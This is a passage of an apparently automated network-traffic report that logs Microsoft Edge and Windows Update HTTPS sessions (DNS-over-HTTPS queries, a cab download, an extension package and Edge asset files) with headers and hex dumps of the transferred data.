                                                                                                                                                      Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00
                                                                                                                                                      Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      6192.168.2.449754172.64.41.34438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 128
                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                      Accept-Language: *
                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      2024-12-04 12:58:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      7192.168.2.449755172.64.41.34438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 128
                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                      Accept-Language: *
                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      2024-12-04 12:58:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      8192.168.2.449756162.159.61.34438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 128
                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                      Accept-Language: *
                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      2024-12-04 12:58:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      9192.168.2.44974120.12.23.50443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=R361f7MVTHdTCvt&MD=TCE+BRaf HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                      2024-12-04 12:58:21 UTC560INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Expires: -1
                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                      MS-CorrelationId: c788f7ce-5921-49c1-ace6-50eabe9392df
                                                                                                                                                      MS-RequestId: 813cc2a8-0fc5-4e70-9ec6-24f85dbfb5bf
                                                                                                                                                      MS-CV: rAaaCRjRkk28QKXr.0
                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:20 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 24490
                                                                                                                                                      2024-12-04 12:58:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                      2024-12-04 12:58:21 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      10192.168.2.449768152.195.19.974438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:23 UTC618OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733921900&P2=404&P3=2&P4=Apf4XrGaxB%2bIL4XfteTK76kLScPQZtPnMob%2bCW3cS9QClvUowtOVlkUWeX8R3QyNE3LZp3QA%2bxRFzYNB72EsiA%3d%3d HTTP/1.1
                                                                                                                                                      Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      MS-CV: e3I7uDuebd6WiJmIMkhEEh
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:24 UTC633INHTTP/1.1 200 OK
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Age: 13243634
                                                                                                                                                      Cache-Control: public, max-age=17280000
                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:23 GMT
                                                                                                                                                      Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                      Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                      MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31
                                                                                                                                                      MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0
                                                                                                                                                      MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4
                                                                                                                                                      Server: ECAcc (nyd/D11E)
                                                                                                                                                      X-AspNet-Version: 4.0.30319
                                                                                                                                                      X-AspNetMvc-Version: 5.3
                                                                                                                                                      X-Cache: HIT
                                                                                                                                                      X-CCC: US
                                                                                                                                                      X-CID: 11
                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                      X-Powered-By: ARR/3.0
                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                      Content-Length: 11185
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-04 12:58:24 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                      Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      11192.168.2.44976513.107.246.634438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:23 UTC486OUTGET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Edge-Asset-Group: ArbitrationService
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:24 UTC552INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:24 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 11989
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Mon, 18 Nov 2024 20:19:33 GMT
                                                                                                                                                      ETag: 0x8DD080E5097FBFA
                                                                                                                                                      x-ms-request-id: 1728e42d-301e-0046-7449-46b691000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125824Z-1746fd949bdqpttnhC1EWRe1wg00000000x000000000adem
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:24 UTC11989INData Raw: 7b 0d 0a 20 20 22 63 6f 6e 66 69 67 56 65 72 73 69 6f 6e 22 3a 20 33 32 2c 0d 0a 20 20 22 50 72 69 76 69 6c 65 67 65 64 45 78 70 65 72 69 65 6e 63 65 73 22 3a 20 5b 0d 0a 20 20 20 20 22 53 68 6f 72 65 6c 69 6e 65 50 72 69 76 69 6c 65 67 65 64 45 78 70 65 72 69 65 6e 63 65 49 44 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 43 4f 55 50 4f 4e 53 5f 43 48 45 43 4b 4f 55 54 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 4c 4f 57 45 52 5f 50 52 49 43 45 5f 46 4f 55 4e 44 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 42 49 4e 47 5f 53 45 41 52 43 48 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 52 45 42 41 54 45
                                                                                                                                                      Data Ascii: { "configVersion": 32, "PrivilegedExperiences": [ "ShorelinePrivilegedExperienceID", "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT", "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND", "SHOPPING_AUTO_SHOW_BING_SEARCH", "SHOPPING_AUTO_SHOW_REBATE


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      12192.168.2.44976713.107.246.634438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:23 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Edge-Asset-Group: Shoreline
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:24 UTC577INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:24 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 306698
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                      Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                      ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                      x-ms-request-id: 2c1956a5-f01e-0014-1cdc-45ab63000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125824Z-1746fd949bdxk6n6hC1EWRdr8c00000000z000000000c090
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:24 UTC15807INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                                      Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c
                                                                                                                                                      Data Ascii: u&U\h|[T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5QafAp
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d
                                                                                                                                                      Data Ascii: ,(T$&O7gkD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35QTB-
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80
                                                                                                                                                      Data Ascii: *B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqP
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e
                                                                                                                                                      Data Ascii: kp4k@?lk/IyMR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~Cl.V
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7
                                                                                                                                                      Data Ascii: {M1eIwyfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
